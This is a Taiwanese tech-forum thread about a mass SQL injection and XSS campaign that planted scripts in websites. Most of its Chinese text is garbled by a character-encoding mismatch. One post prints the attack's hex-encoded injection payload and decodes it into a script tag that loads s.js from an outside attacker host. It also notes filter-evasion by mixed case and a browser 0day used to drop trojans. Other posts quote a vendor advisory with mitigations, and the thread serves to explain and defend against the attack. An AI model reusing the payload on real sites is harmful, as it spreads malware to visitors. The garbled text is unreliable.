![]() |
PCDVD¼Æ¦ì¬ì§Þ°Q½×°Ï
(https://www.pcdvd.com.tw/index.php)
- ¤C¼L¤K¦Þ²§¨¥°ó
(https://www.pcdvd.com.tw/forumdisplay.php?f=12)
- - ª`·N¦Û¤vªººô¶¬O§_¤]³Q¤J«I....
(https://www.pcdvd.com.tw/showthread.php?t=796417)
|
|---|
¤Þ¥Î:
¤p§Ì»{¬°¦³¤K¦¨ªº¥i¯à¬O SQL Injection .. ¦]¬°¥Ñ¼Ó¥D´£¨ÑªººI¹Ï¬Ý¨Ó..¸ê®Æ®w¤º¤w¸g³Q update ¹L¦Ó¶ë¤J¤F java script¤F .. ©Ò¥H¨CÓ®a±Ú¦WºÙ¤U±³£¥X²{«½Æ©Êªº java script code .. «ö·ÓºI¹Ï§PÂ_..¦ü¥G¸Ó°Q½×°Ï¨t²Î¦³Àɪºjava scriptªº¼Ë¤l..©Ò¥HÁÙ¬O¬Ý±o¨ì code .. (²{¦b¤u§@¾÷¬O¶]xp¤£´±¥h³s :p .. ¦^®a´«linux¾÷¾¹¦A³s¨ì¸Óºô¯¸¸Õ¸Õ¬Ý..) ¦pªG¬O¦³¤ß¤H¥h¯d¨¥ª©¤º«½Æ¶Kcodeªº¸Ü.. À³¸Ó·|¦bµo²{¦³¾×¦íscriptªº±¡ªp¤U°±¤î¶Kªº°Ê§@..©Ò¥H§Ú»{¬°¬O¤w¸g¬}±x¸ê®Æ®wÄæ¦ìªº SQL Injection .. ¦Ó¤£¬O³æ¯Âªº¶K¤å¶ëcodeªºcode injection.. ¥t¥~¥H¥L½¯©µªº±¡ªp¦Ó¨¥.. §Ú»{¬°¬O°w¹ï¯S©wªº¯d¨¥ª©¨t²Î¶i¦æ§ðÀ»ªº.. ³]©wµ{¦¡¥h¶]..§ì¨ì¬O¯S©w¯d¨¥ª©¨t²Î®É´N¥ÎSQL Injection¶ëcode¶i¥h.. ¤£¹L²{¶¥¬q¬O¬Ý¹Ï»¡¬G¨Æ..¤@¤Á³£³£ÁÙ¬O¤p§Ìªº²q´ú°Õ.. ±ß¤W¦^®a´«linuxªº¾÷¾¹¦b³s¹L¥h¬Ý¬Ý.. |
¨â¦~«e¬[phpbb®É´N³Q¶ë¹L¤F..orz|||
|
SQL Injection ªº§t·N«Ü¼s§a..
¤£¹L³oӬݨӬO³æ¯Âªº¦b¯d¨¥ª©ªº¦a¤è¶ë¤Jscript»yªk,¤£¨£±on¥Î¨ìSQL »yªk ¦pªG¯d¨¥ª©¨S¦³¹ï¤º®e°µ¤@¨ÇÅçÃҩΧPÂ_,´N·|µo¥Í³oºØª¬ªp ·íµM¥i¥H¤USQL Injection ªº¸Ü,µ²ªG´N¤£¥u¬Oºô¶³Q¶ëscript¤F... ·d¤£¦nDB³£³Q¬å¤F |
XSS Attack?SQL Injection?
¤p§Ìªº¬Ýªk¬OXSS Attack,SQL Injectionªº¸Ü,¤£·|¬O¥u¶ñ¤J³o¨Ç¸ê®Æ¦Ó¤w ª½±µ±Nºô¯¸ªº¾ãÓDB Drop±¼³£¥i¥H ¥tSQL Injection or XSS Attack,³£¤£¶È©óWindows+IIS¥¥x ¤j²¤»¡¤@¤U,XSS Attack¬OÂǥѿé¤JScript©óºô¶¤W,ÅѨúÂsÄý¸Óºô¶ªº¨Ï¥ÎªÌªºCookie¸ê®Æ SQL Injection¬O§Q¥ÎSQL »yªk§ðÀ»ºô¯¸«áºÝªºDB ¦U¦ì¥i¥H¤Wgoogle°Ñ¦Ò¤@¤UXSS§ðÀ» ¦³¿ù½Ð«ü±Ð |
¸É¥R.XSS Attack ¤£¥²¸g¥ÑSQL Injection
¨Ò¦p,§Ú²{¦b¦b¯d¨¥®É,¥i¥HÂǥѴ¡¤J¤@ӹϤù®I¤U¤@¬qjava script¤F ©Ò¥H¨¾¨îªº¤èªk¥i¥H¬O,ServerºÝªºµ{¦¡§PÂ_¯d¨¥¤º®e¬O§_¦³¤£À³¸Ó¥X²{ªº¦r¦ê |
¤Þ¥Î:
¦]¬°¥Lªº¥Øªº¬O´²¼· s.js ¦Ó¤£¬O·d«±ºô¯¸.. ©Ò¥H¶ñ¤J³o¨Ç¦r¦ê´Nºïºï¦³¾l¤F..§âtable drop±¼¥u¬O¾ÉPºô¯¸ÅõºÈ.. °§C´²¼½³t«×½}¤F :( ¤Þ¥Î:
©Ò¥H¥i¯à¬O XSS Attack ²V¦X SQL Injection §ðÀ» .. §Q¥Î SQL Injection ±Nºô¯¸¤º®eȤJ java script «á.. ¨Ï¥ÎªÌ¥ÎÂsÄý¾¹ÂsÄý®É°õ¦æ¸Ó¬q script ¾ÉP XSS Attack .. ¤ì°¨ÂǦ¹¶i¤J¨Ï¥ÎªÌ¹q¸£..¨Ã¥B©óÂsÄý¾¹ÂsÄý¨ä¥Lºô¯¸®É..·|¹Á¸Õ¦³µL SQL Injection º|¬}Ä~Äò´²¼½.. ¦]¦¹µo¥Í«e¤å pkopko ¥S´£¨Ñªºª¬ªp..²M±¼«á·|¤@ª½´_µo..¥B¤º¥~ºô¬Ò¤¤¼Ð.. ¬Ò»F¦]©ó¤º³¡¨Ï¥ÎªÌ¤¤¤ì°¨¤F..«o¨S¦³µo²{¦Ó¦p±`ªº¨Ï¥Î¤½¥q¤º¥~ºô¯¸ :( ·íµM°Õ :) ~~ ³oÁÙ¬O¬Ý¹Ï»¡¬G¨Æ :p ... ¶È¨Ñ°Ñ¦Ò..¦³¿ùÅwªï¥Î¤O¦R¯ó~~ |
¤Þ¥Î:
³¥¤f¥S»¡¹ï¤F..¬O SQL Injection ¨S¿ù..¤£·\¬Oªø´Á¦bÃö¤ß¬ÛÃö¸ê°Tªº°ª¤â :) èè°lÂܤF script «á.. ¥Î¤@¨ÇÃöÁä¦r¥h¬d¤§«á¤jP¤F¸Ñ±¡ªp¤F.. ¬OÄÝ©ó SQL Injection + XSS + 0day ²V¦X§ðÀ»«¬ªº.. (0day¬O«ü¦b¦w¥þ¸É¤Bµo§G«e¦Ó³Q¤F¸Ñ©M´x´¤ªºº|¬}¸ê°T¡C) SQL Injection ¨Ï¥Îªº Code ¦p¤U.. ¤Þ¥Î:
§ðÀ»ªÌ«Ü²Ó¤ßªº¥Î¤F¤j¤p¼g¥æ¿ùÁ×¶}¤@¯ëµ{¦¡¤¤¹ïRequestªºÀˬd.. ¹ïSQL Server¸ê®Æ®w¸Ì± xtype=99 ntext xtype=35 text xtype=231 nvarchar xtype=167 varchar ¥|ºØ¸ê®Æ«¬ºA¶i¦æ update .. ¶ë¤Jªº¸ê®Æ¤Q¤»¶i¦ì¬° 0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3 Âà´«¬°¦r¦ê§Y¬O"></title><script src=http://s.see9.us/s.js></script><!-- ³o¸Ì¦A¦¸®i²{§ðÀ»ªÌªº²Ó¤ß =_= .. ¥Î¤Q¤»¶i¦ì¥N½X¨ú¥N®e©ö³Q§ì¨ìªº html script .. ¦]¬°¥D§ð sql server .. ©Ò¥H¬Ý°_¨Ó³£¬O IIS ¤¤¼Ð.. ²¦³º¤@¯ë«á¥x DB ·|¥Î sql server ªº±¡ªp¤U..«e¥x¤j³£¬O IIS + ASP (.NET) .. ±µ¤U¨Ó¨Ï¥Î XSS Attack Åýºô¯¸ÂsÄýªÌªºÂsÄý¾¹°õ¦æ§ðÀ»ªÌ¦w±Æªº Java Script .. ¥Î 0day Æpº|¬}¨ú±oºô¯¸ÂsÄýªÌ¥»¾÷¤@©wªºÅv..¤§«eªº0dayº|¬}¬O§ì real play ªº.. ¦ý¥un§ðÀ»ªÌ°ª¿³..¥un´À´« script ÀH®É¥i¥H¥Î¨ä¥L 0day º|¬}§ðÀ»ÂsÄýªÌ¥»¾÷ .. ³Ì«á¬O§ðÀ»ªÌªº¥Øªº.. À³¸Ó¬O "ÂI¼s§i" .. §Q¥Î¤T«¾÷¨î±N¤ì°¨¶Ç¼½¥X¥h¤§«á .. À°§ðÀ»ªÌÂIºô¸ô****ÁÈ¿ú :( .. ¤p§Ì¬O°Ñ¦Òºî¦X¨â¥÷¤j³°½×¾Â¸ê®Æ°µ¥Xªºµ²½×.. ¬°§Kª½±µ³s±µ½×¾Âªº¦MÀI..©Ò¥H´£¨Ñ¨â¥÷Google ¤å¦r§Ö¨ú¨ÑªO¤ÍÌ°Ñ¦Ò .. http://72.14.235.104/search?q=cache...x&gl=tw&strip=1 http://72.14.235.104/search?q=cache...l=zh-TW&strip=1 ¶È¨Ñ°Ñ¦Ò..¦³¿ùÅwªï¥Î¤O¦R¯ó~~ |
¨ä¹êÂI¶i³¥¤f¥Sªºavpclub½×¾Â
°¨¤W´N§ä¨ì¬ÛÃö¸ê°T¤F ^^||| ..¹ê¦b»á¦³¥Õ°µ¥\½Ò¤§·Pı.. http://www.avpclub.ddns.info/discuz...-10913-1-1.html ¤Þ¥Î:
¥i¨ÑªO¤ÍÌ°Ñ¦Ò |
foxtm²Ó¤ß¡I¯uªº¨ü±Ð¤F¡I¡I
³o¬Ocode injection, sql injectionªº²Õ¦X¨S¿ù¡I ¬Ý¹Ï»¡¸ÜªGµM½§²L¡A¤S¨ü±Ð¤F¤@¦¸¡I¡I ¤£¹Ln¬O¨Ï¥Îsql injection¡A´Nn²q¨ìtableªºÄæ¦ì¦WºÙ ©Ò¥H³oÀ³¸Ó¬O°w¹ï¤@¨Ç²{¦¨®M¸Ë(¦³«Ü¦h¬Oºô¸ô¤W¨ú±o§K¶Oªº)¨t²Îªº§ðÀ»§a¡I |
¬ÛÃö¸ê°T¦b³oùØ
http://www.armorize.com.tw/news/shownews.php?news=22 ¤µ¤Ñ¤S¦³·sªº¸ê°T¥X¨Ó http://www.armorize.com.tw/news/shownews.php?news=23 ªü½X¬ì§ÞASF™(Armorize Special Forces)¸ê¦w¹Î¶¤²`¤J¤ÀªR«á¡A©ó05¤ë20¤é³qª¾´CÅé¨Ãµo¥X·s»D½Z¡G 05202008 ¥xÆWºô¯¸¾D¨ü¦³¥v¥H¨Ó³Ì¤j³W¼ÒSQL Injection §ðÀ»--·s«¬ºAªºMass SQL Injection¦b¥x¤Wºt ·í®É§ÚÌ©ó·s»D½Z¤¤«ü¥X¡A¡u±À´ú¥Ç¸o¶°¹Î¦b¶i¦æ¤j³W¼Òºô¯¸§G§½¡Aµ¥«Ý¤U¤@ÓÂsÄý¾¹¹s®É®t§ðÀ»(Zero Day Attack) ¥X²{«á¤j¶q¦¬³Î¡C¡v ¦]¬°·í®ÉASF™¹Î¶¤¦b°lÂܹLµ{¤¤¤w¸gµo²{¡A¥Ç¸o¶°¹Î¦ü¥G¬G·N¤£Åý´c·N³sµ²µo¥Í¹ê»Ú®Ä¥Î¡A§G§½ªº·N¨ý¿@«p¡C ASF™¹Î¶¤©ó05¤ë23¤é¶}©l¡Aµo²{Àb«È¶°¹Î¦b¨ä¤j³W¼ÒSQL Injection§ðÀ»¤¤¡A¶}©l±Ä¥Î§ðÀ»Adobe Flash¤§ºô°¨¡]malware¡^¡A¸g²`¤J¤ÀªR¡A»®µMµo²{¦¹¬°Adobe Flash ¤§¹s®É®t§ðÀ»¡]Zero Day Attack / 0day¡^¡I¦¹¦¸¤j³W¼Ò§ðÀ»¡A¦Û01¤ë¶}©l¦Ü¤µ¥¼°±¡A¥Ø«e¤S¥X²{·f°t¹s®É®t§ðÀ»¤âªk¡A³ôºÙ«e©Ò¥¼¦³¤§ÄY«¤j³W¼Ò§ðÀ»¨Æ¥ó¡A¬G¸Ôz¦p¤U¡C [¥Î¤áºÝ¦w¥þ«ØÄ³ ] ¦¹¦¸¬°¹s®É®t§ðÀ»¡A¬G§ÚÌ©ó05¤ë20¤½¥¬¤§[¥Î¤áºÝ¦w¥þ«ØÄ³]µL®Ä¡C°w¹ï¦¹¦¸§ðÀ»¡A§ÚÌ«ØÄ³¼È®ÉÃö³¬Adobe Flash¡CÁöµM¦¹Á|·|³y¦¨³\¦hºô¯¸¦bÂsÄý®É¤§°ÝÃD¡AµM¦¹¬°¹s®É®t§ðÀ»¡A¥Ø«e¨ÃµL¨ä¥L¤èªk¡CIE¨Ï¥ÎªÌ¥i¦Û[¤u¨ã]¡÷ºÞ²zªþ¥[¤u¨ã¡A¨Ã°±¥Î"Shockwave Flash Object"¡CFirefox¥Î¤á¥i¥H§Q¥Îregedt32.exe(regedit.exe)§â CLSID ¤§ d27cdb6e-ae6d-11cf-96b8-444553540000³]¦¨ 1¡A¥H¼È®É°±¤îFlash¤§¹B§@¡C |
| ©Ò¦³ªº®É¶¡§¡¬°GMT +8¡C ²{¦bªº®É¶¡¬O05:34 AM. |
vBulletin Version 3.0.1
powered_by_vbulletin 2026¡C